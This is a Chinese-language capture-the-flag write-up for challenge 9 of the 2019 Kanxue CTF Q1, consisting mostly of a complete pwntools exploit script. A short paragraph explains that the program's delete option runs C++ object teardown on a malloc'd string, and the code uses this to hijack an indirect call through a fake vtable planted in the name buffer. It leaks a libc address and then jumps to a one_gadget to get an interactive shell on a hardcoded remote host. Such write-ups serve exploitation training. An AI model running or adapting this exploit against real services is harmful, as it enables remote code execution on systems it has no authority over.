
[原创]【2019看雪CTF】Q1赛季 第九题 C与C++ WP


【2019看雪CTF】Q1赛季 第九题 C与C++ WP

delete 操作（菜单第 4 项）没有校验所选下标对应的是否为 new 出来的 C++ 对象，因此可以对 malloc 申请的普通字符串块执行 delete。只要在这块可控内存中布置好伪造的对象/虚表指针，delete 走析构流程时就会按我们给的指针做间接调用，等于得到一次任意函数调用：第一次用它调用菜单里永远不会执行到的 sub_400E10 完成 leak，第二次用它调用 one_gadget 拿到 shell。伪造的函数指针需要放在一个地址已知的可控缓冲区里，这里用的是程序开头输入的名字（程序未开 PIE，该缓冲区地址固定，exp 中的 0x602328 应即此处）。完整 exp 如下：

#!/usr/bin/env python
from pwn import *


def login(name):
    """Answer the startup name prompt with ``name``.

    ``name`` goes out verbatim followed by the newline ``sendline`` appends;
    the exploit uses this buffer to plant raw pointer values, so pass bytes.
    """
    io.sendlineafter('your name: ', name)

def malloc(size, content):
    """Menu option 1: allocate a plain (non-object) string of ``size`` bytes
    and fill it with ``content``."""
    dialogue = (
        ('>> ', '1'),
        ('length of the string\n', str(size)),
        ("input the string\n", content),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)

def new(size, content):
    """Menu option 3: create a C++ string object of ``size`` bytes holding
    ``content``."""
    io.sendlineafter('>> ', '3')
    io.sendlineafter('length of the string\n', str(size))
    io.sendlineafter("input the string\n", content)

def free(idx):
    """Menu option 2: release slot ``idx`` via the plain C path (free)."""
    io.sendlineafter('>> ', '2')
    io.sendlineafter('index of the string\n', str(idx))


def delete(idx):
    """Menu option 4: release slot ``idx`` via the C++ path (delete).

    This is the vulnerable primitive: the program does not check that the
    slot holds an object, so a ``malloc``'d string with attacker-controlled
    contents is torn down as if it were one.
    """
    steps = (('>> ', '4'), ('index of the string\n', str(idx)))
    for prompt, answer in steps:
        io.recvuntil(prompt)
        io.sendline(answer)

def puts(idx):
    """Menu option 5: print slot ``idx`` and return the echoed line with its
    trailing newline stripped."""
    io.sendlineafter('>> ', '5')
    io.sendlineafter('index of the string\n', str(idx))
    echoed = io.recvline()
    return echoed[:-1]


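def pwn():
    """Drive the two-stage exploit over the global tube ``io``.

    Both stages abuse the same primitive: menu option 4 (``delete``) does not
    verify that the selected slot holds a C++ object, so it runs the object
    teardown on a plain ``malloc``'d string whose contents we control and
    ends up calling through a pointer we planted.  Stage 1 aims that call at
    sub_400E10 (a routine the menu itself never reaches) to leak a libc
    address; stage 2 aims it at a one_gadget to get a shell.

    The function pointers live in the name entered at startup (``login``):
    the binary is not PIE, so that buffer sits at a fixed address which is
    reused as the fake vtable.

    Side effects: sends/receives on ``io`` and finally hands it over
    interactively.  Payloads are built from bytes so the script runs under
    both Python 2 and Python 3 pwntools.
    """
    # libc-specific offsets.  They look like a stock Ubuntu 16.04 glibc 2.23
    # build (puts@0x6F690) but that is not recorded anywhere; for any other
    # libc both values must be recomputed.
    puts_off = 0x6F690
    one_off = 0xf02a4   # execve("/bin/sh", rsp+0x50, environ); needs [rsp+0x50] == NULL
    # Other one_gadget candidates in the same libc, should the constraint
    # above not hold at the time of the hijacked call:
    #   0x45216  execve("/bin/sh", rsp+0x30, environ)   rax == NULL
    #   0x4526a  execve("/bin/sh", rsp+0x30, environ)   [rsp+0x30] == NULL
    #   0xf1147  execve("/bin/sh", rsp+0x70, environ)   [rsp+0x70] == NULL

    # Binary-side constants (non-PIE, hence fixed).  What 0x4009A0 and
    # 0x401228 point at is not documented in the writeup; check the
    # disassembly before reusing them.
    name_buf = 0x602328      # presumably the startup-name buffer; doubles as the fake vtable
    leak_fn = 0x400E10       # sub_400E10: the menu-unreachable routine used for the leak
    fn_second = 0x4009A0     # TODO(review): confirm role (second fake vtable slot)
    fill_ptr = 0x401228      # TODO(review): confirm role (repeated through the 0x1ef chunk)

    # One "cell" of the object body: a pointer followed by 7 NUL bytes.  The
    # 15-byte stride is what the original exploit uses; why it is not 16 is
    # not explained -- keep it unless you have re-derived the layout.
    cell = p64(fill_ptr) + b'\x00' * 7

    # --- stage 1: leak a libc address -------------------------------------
    # 15 bytes are sent so that, together with the newline sendline appends,
    # the program's read is filled exactly (presumably a 16-byte read).
    login(p64(leak_fn) + p64(fn_second)[:-1])
    # slot 0: the plain malloc'd string that will later be "deleted".  The
    # second qword (0x18) is read by the delete path; its exact role is not
    # confirmed here.
    malloc(8, b'a' * 8 + p64(0x18))
    # slot 1: a real 0x1ef-byte object whose body ends with pointers into
    # the fake vtable (name_buf + 8, then name_buf).
    new(0x1ef, cell * 0x1d + p64(name_buf + 8) + b'\x00' * 7 + p64(name_buf))
    # gdb.attach(io, 'b *0x400D90')   # breakpoint used while developing
    delete(0)
    # Expects the leak printed as "0x" + 12 hex digits; a different format
    # would desynchronise this fixed-width read.
    puts_addr = int(io.recv(14)[2:], 16)
    libc_base = puts_addr - puts_off
    if libc_base & 0xfff:
        # A misaligned base means the leak or puts_off is wrong; stage 2
        # would then jump to garbage, so say so loudly.
        log.warning('libc base %#x is not page aligned: leak or offsets are off', libc_base)
    one_addr = libc_base + one_off
    log.info('puts@libc = %#x, one_gadget = %#x', puts_addr, one_addr)

    # --- stage 2: redirect the call to the one_gadget ---------------------
    # Same layout as stage 1, but the fake vtable is now just the gadget and
    # the object ends with a single pointer to it.  Slots 0/1 are taken, so
    # the new malloc'd string is slot 2.
    login(p64(one_addr))
    malloc(8, b'a' * 8 + p64(0x18))
    new(0x1ef, cell * 0x1e + p64(name_buf))
    delete(2)
    log.info('get shell...')
    io.interactive()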



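if __name__ == '__main__':
    context(arch='amd64', kernel='amd64', os='linux')
    # Contest-era target; almost certainly no longer serving the challenge.
    HOST, PORT = '154.8.222.144', 9999
    # ``l`` as the first argument runs the local binary in a process tube
    # with debug-level I/O logging; anything else targets the remote host.
    # Set ``context.log_level = 'debug'`` in the remote branch too if you
    # need to see the raw traffic there.
    if len(sys.argv) > 1 and sys.argv[1] == 'l':
        io = process('./candcpp')
        context.log_level = 'debug'
    else:
        io = remote(HOST, PORT)
    pwn()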

